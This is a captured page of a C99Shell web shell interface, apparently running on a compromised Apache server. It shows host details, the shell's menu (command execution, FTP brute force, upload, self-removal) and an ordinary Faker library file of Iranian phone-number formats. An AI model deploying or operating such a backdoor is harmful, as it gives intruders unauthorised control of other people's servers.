!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/fakerphp/faker/src/Faker/Provider/fa_IR/   drwxrwxr-x
Free 13.09 GB of 57.97 GB (22.58%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PhoneNumber.php (2.28 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Faker\Provider\fa_IR;

class 
PhoneNumber extends \Faker\Provider\PhoneNumber
{
    
/**
     * @see https://fa.wikipedia.org/wiki/%D8%B4%D9%85%D8%A7%D8%B1%D9%87%E2%80%8C%D9%87%D8%A7%DB%8C_%D8%AA%D9%84%D9%81%D9%86_%D8%AF%D8%B1_%D8%A7%DB%8C%D8%B1%D8%A7%D9%86#.D8.AA.D9.84.D9.81.D9.86.E2.80.8C.D9.87.D8.A7.DB.8C_.D9.87.D9.85.D8.B1.D8.A7.D9.87
     */
    
protected static $formats = [ // land line formts seprated by province
        
'011########'//Mazandaran
        
'013########'//Gilan
        
'017########'//Golestan
        
'021########'//Tehran
        
'023########'//Semnan
        
'024########'//Zanjan
        
'025########'//Qom
        
'026########'//Alborz
        
'028########'//Qazvin
        
'031########'//Isfahan
        
'034########'//Kerman
        
'035########'//Yazd
        
'038########'//Chaharmahal and Bakhtiari
        
'041########'//East Azerbaijan
        
'044########'//West Azerbaijan
        
'045########'//Ardabil
        
'051########'//Razavi Khorasan
        
'054########'//Sistan and Baluchestan
        
'056########'//South Khorasan
        
'058########'//North Khorasan
        
'061########'//Khuzestan
        
'066########'//Lorestan
        
'071########'//Fars
        
'074########'//Kohgiluyeh and Boyer-Ahmad
        
'076########'//Hormozgan
        
'077########'//Bushehr
        
'081########'//Hamadan
        
'083########'//Kermanshah
        
'084########'//Ilam
        
'086########'//Markazi
        
'087########'//Kurdistan
    
];

    protected static 
$mobileNumberPrefixes = [
        
'0910#######'//mci
        
'0911#######',
        
'0912#######',
        
'0913#######',
        
'0914#######',
        
'0915#######',
        
'0916#######',
        
'0917#######',
        
'0918#######',
        
'0919#######',
        
'0901#######',
        
'0901#######',
        
'0902#######',
        
'0903#######',
        
'0930#######',
        
'0933#######',
        
'0935#######',
        
'0936#######',
        
'0937#######',
        
'0938#######',
        
'0939#######',
        
'0920#######',
        
'0921#######',
        
'0937#######',
        
'0990#######'// MCI
    
];

    public static function 
mobileNumber()
    {
        return static::
numerify(static::randomElement(static::$mobileNumberPrefixes));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--